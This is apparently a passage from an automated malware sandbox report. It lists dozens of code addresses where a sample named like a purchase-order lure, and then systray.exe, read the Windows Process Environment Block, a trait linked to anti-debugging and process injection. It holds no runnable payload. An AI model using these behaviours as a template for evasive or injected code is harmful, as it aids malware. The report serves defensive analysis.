          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDB390 mov eax, dword ptr fs:[00000030h]4_2_00EDB390
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EB8794 mov eax, dword ptr fs:[00000030h]4_2_00EB8794
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB60 mov ecx, dword ptr fs:[00000030h]4_2_00EADB60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBFF60 mov eax, dword ptr fs:[00000030h]4_2_00EBFF60
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]4_2_00ED3B7A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ED3B7A mov eax, dword ptr fs:[00000030h]4_2_00ED3B7A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78F6A mov eax, dword ptr fs:[00000030h]4_2_00F78F6A
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EADB40 mov eax, dword ptr fs:[00000030h]4_2_00EADB40
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EBEF40 mov eax, dword ptr fs:[00000030h]4_2_00EBEF40
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F78B58 mov eax, dword ptr fs:[00000030h]4_2_00F78B58
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EAF358 mov eax, dword ptr fs:[00000030h]4_2_00EAF358
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]4_2_00EA4F2E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EA4F2E mov eax, dword ptr fs:[00000030h]4_2_00EA4F2E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDE730 mov eax, dword ptr fs:[00000030h]4_2_00EDE730
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]4_2_00F3FF10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F3FF10 mov eax, dword ptr fs:[00000030h]4_2_00F3FF10
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]4_2_00EDA70E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00EDA70E mov eax, dword ptr fs:[00000030h]4_2_00EDA70E
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F6131B mov eax, dword ptr fs:[00000030h]4_2_00F6131B
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]4_2_00F7070D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00F7070D mov eax, dword ptr fs:[00000030h]4_2_00F7070D
          Source: C:\Users\user\Desktop\PO-RFQ # 097663899.exeCode function: 4_2_00ECF716 mov eax, dword ptr fs:[00000030h]4_2_00ECF716
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148D34 mov eax, dword ptr fs:[00000030h]14_2_05148D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513E539 mov eax, dword ptr fs:[00000030h]14_2_0513E539
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A4D3B mov eax, dword ptr fs:[00000030h]14_2_050A4D3B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507AD30 mov eax, dword ptr fs:[00000030h]14_2_0507AD30
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050FA537 mov eax, dword ptr fs:[00000030h]14_2_050FA537
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05083D34 mov eax, dword ptr fs:[00000030h]14_2_05083D34
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B3D43 mov eax, dword ptr fs:[00000030h]14_2_050B3D43
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3540 mov eax, dword ptr fs:[00000030h]14_2_050F3540
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05097D50 mov eax, dword ptr fs:[00000030h]14_2_05097D50
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]14_2_0509C577
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C577 mov eax, dword ptr fs:[00000030h]14_2_0509C577
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2581 mov eax, dword ptr fs:[00000030h]14_2_050A2581
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05072D8A mov eax, dword ptr fs:[00000030h]14_2_05072D8A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]14_2_050AFD9B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AFD9B mov eax, dword ptr fs:[00000030h]14_2_050AFD9B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A35A1 mov eax, dword ptr fs:[00000030h]14_2_050A35A1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]14_2_051405AC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051405AC mov eax, dword ptr fs:[00000030h]14_2_051405AC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A1DB5 mov eax, dword ptr fs:[00000030h]14_2_050A1DB5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov ecx, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6DC9 mov eax, dword ptr fs:[00000030h]14_2_050F6DC9
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05128DF1 mov eax, dword ptr fs:[00000030h]14_2_05128DF1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]14_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508D5E0 mov eax, dword ptr fs:[00000030h]14_2_0508D5E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513FDE2 mov eax, dword ptr fs:[00000030h]14_2_0513FDE2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6C0A mov eax, dword ptr fs:[00000030h]14_2_050F6C0A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131C06 mov eax, dword ptr fs:[00000030h]14_2_05131C06
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514740D mov eax, dword ptr fs:[00000030h]14_2_0514740D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050ABC2C mov eax, dword ptr fs:[00000030h]14_2_050ABC2C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]14_2_0510C450
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510C450 mov eax, dword ptr fs:[00000030h]14_2_0510C450
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA44B mov eax, dword ptr fs:[00000030h]14_2_050AA44B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509746D mov eax, dword ptr fs:[00000030h]14_2_0509746D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508849B mov eax, dword ptr fs:[00000030h]14_2_0508849B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148CD6 mov eax, dword ptr fs:[00000030h]14_2_05148CD6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051314FB mov eax, dword ptr fs:[00000030h]14_2_051314FB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]14_2_050F6CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]14_2_050F6CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F6CF0 mov eax, dword ptr fs:[00000030h]14_2_050F6CF0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FF10 mov eax, dword ptr fs:[00000030h]14_2_0510FF10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FF10 mov eax, dword ptr fs:[00000030h]14_2_0510FF10
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA70E mov eax, dword ptr fs:[00000030h]14_2_050AA70E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA70E mov eax, dword ptr fs:[00000030h]14_2_050AA70E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514070D mov eax, dword ptr fs:[00000030h]14_2_0514070D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0514070D mov eax, dword ptr fs:[00000030h]14_2_0514070D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509F716 mov eax, dword ptr fs:[00000030h]14_2_0509F716
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05074F2E mov eax, dword ptr fs:[00000030h]14_2_05074F2E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05074F2E mov eax, dword ptr fs:[00000030h]14_2_05074F2E
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AE730 mov eax, dword ptr fs:[00000030h]14_2_050AE730
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508EF40 mov eax, dword ptr fs:[00000030h]14_2_0508EF40
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508FF60 mov eax, dword ptr fs:[00000030h]14_2_0508FF60
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148F6A mov eax, dword ptr fs:[00000030h]14_2_05148F6A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]14_2_050F7794
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]14_2_050F7794
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7794 mov eax, dword ptr fs:[00000030h]14_2_050F7794
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05088794 mov eax, dword ptr fs:[00000030h]14_2_05088794
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B37F5 mov eax, dword ptr fs:[00000030h]14_2_050B37F5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]14_2_0507C600
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]14_2_0507C600
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C600 mov eax, dword ptr fs:[00000030h]14_2_0507C600
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A8E00 mov eax, dword ptr fs:[00000030h]14_2_050A8E00
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA61C mov eax, dword ptr fs:[00000030h]14_2_050AA61C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA61C mov eax, dword ptr fs:[00000030h]14_2_050AA61C
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05131608 mov eax, dword ptr fs:[00000030h]14_2_05131608
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507E620 mov eax, dword ptr fs:[00000030h]14_2_0507E620
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512FE3F mov eax, dword ptr fs:[00000030h]14_2_0512FE3F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05087E41 mov eax, dword ptr fs:[00000030h]14_2_05087E41
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AE44 mov eax, dword ptr fs:[00000030h]14_2_0513AE44
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0513AE44 mov eax, dword ptr fs:[00000030h]14_2_0513AE44
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508766D mov eax, dword ptr fs:[00000030h]14_2_0508766D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]14_2_0509AE73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]14_2_0509AE73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]14_2_0509AE73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]14_2_0509AE73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509AE73 mov eax, dword ptr fs:[00000030h]14_2_0509AE73
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510FE87 mov eax, dword ptr fs:[00000030h]14_2_0510FE87
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F46A7 mov eax, dword ptr fs:[00000030h]14_2_050F46A7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]14_2_05140EA5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]14_2_05140EA5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05140EA5 mov eax, dword ptr fs:[00000030h]14_2_05140EA5
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05148ED6 mov eax, dword ptr fs:[00000030h]14_2_05148ED6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A36CC mov eax, dword ptr fs:[00000030h]14_2_050A36CC
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B8EC7 mov eax, dword ptr fs:[00000030h]14_2_050B8EC7
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0512FEC0 mov eax, dword ptr fs:[00000030h]14_2_0512FEC0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A16E0 mov ecx, dword ptr fs:[00000030h]14_2_050A16E0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050876E2 mov eax, dword ptr fs:[00000030h]14_2_050876E2
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]14_2_05079100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]14_2_05079100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079100 mov eax, dword ptr fs:[00000030h]14_2_05079100
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov eax, dword ptr fs:[00000030h]14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05094120 mov ecx, dword ptr fs:[00000030h]14_2_05094120
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A513A mov eax, dword ptr fs:[00000030h]14_2_050A513A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A513A mov eax, dword ptr fs:[00000030h]14_2_050A513A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509B944 mov eax, dword ptr fs:[00000030h]14_2_0509B944
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509B944 mov eax, dword ptr fs:[00000030h]14_2_0509B944
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507C962 mov eax, dword ptr fs:[00000030h]14_2_0507C962
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B171 mov eax, dword ptr fs:[00000030h]14_2_0507B171
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B171 mov eax, dword ptr fs:[00000030h]14_2_0507B171
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0509C182 mov eax, dword ptr fs:[00000030h]14_2_0509C182
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AA185 mov eax, dword ptr fs:[00000030h]14_2_050AA185
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A2990 mov eax, dword ptr fs:[00000030h]14_2_050A2990
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F69A6 mov eax, dword ptr fs:[00000030h]14_2_050F69A6
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A61A0 mov eax, dword ptr fs:[00000030h]14_2_050A61A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A61A0 mov eax, dword ptr fs:[00000030h]14_2_050A61A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]14_2_050F51BE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]14_2_050F51BE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]14_2_050F51BE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F51BE mov eax, dword ptr fs:[00000030h]14_2_050F51BE
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]14_2_0507B1E1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]14_2_0507B1E1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0507B1E1 mov eax, dword ptr fs:[00000030h]14_2_0507B1E1
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_051041E8 mov eax, dword ptr fs:[00000030h]14_2_051041E8
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05144015 mov eax, dword ptr fs:[00000030h]14_2_05144015
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05144015 mov eax, dword ptr fs:[00000030h]14_2_05144015
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]14_2_050F7016
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]14_2_050F7016
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F7016 mov eax, dword ptr fs:[00000030h]14_2_050F7016
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]14_2_0508B02A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]14_2_0508B02A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]14_2_0508B02A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0508B02A mov eax, dword ptr fs:[00000030h]14_2_0508B02A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]14_2_050A002D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]14_2_050A002D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]14_2_050A002D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]14_2_050A002D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A002D mov eax, dword ptr fs:[00000030h]14_2_050A002D
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05090050 mov eax, dword ptr fs:[00000030h]14_2_05090050
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05090050 mov eax, dword ptr fs:[00000030h]14_2_05090050
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05132073 mov eax, dword ptr fs:[00000030h]14_2_05132073
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05141074 mov eax, dword ptr fs:[00000030h]14_2_05141074
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_05079080 mov eax, dword ptr fs:[00000030h]14_2_05079080
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3884 mov eax, dword ptr fs:[00000030h]14_2_050F3884
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050F3884 mov eax, dword ptr fs:[00000030h]14_2_050F3884
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050B90AF mov eax, dword ptr fs:[00000030h]14_2_050B90AF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050A20A0 mov eax, dword ptr fs:[00000030h]14_2_050A20A0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov ecx, dword ptr fs:[00000030h]14_2_050AF0BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov eax, dword ptr fs:[00000030h]14_2_050AF0BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_050AF0BF mov eax, dword ptr fs:[00000030h]14_2_050AF0BF
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov eax, dword ptr fs:[00000030h]14_2_0510B8D0
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_0510B8D0 mov ecx, dword ptr fs:[00000030h]14_2_0510B8D0
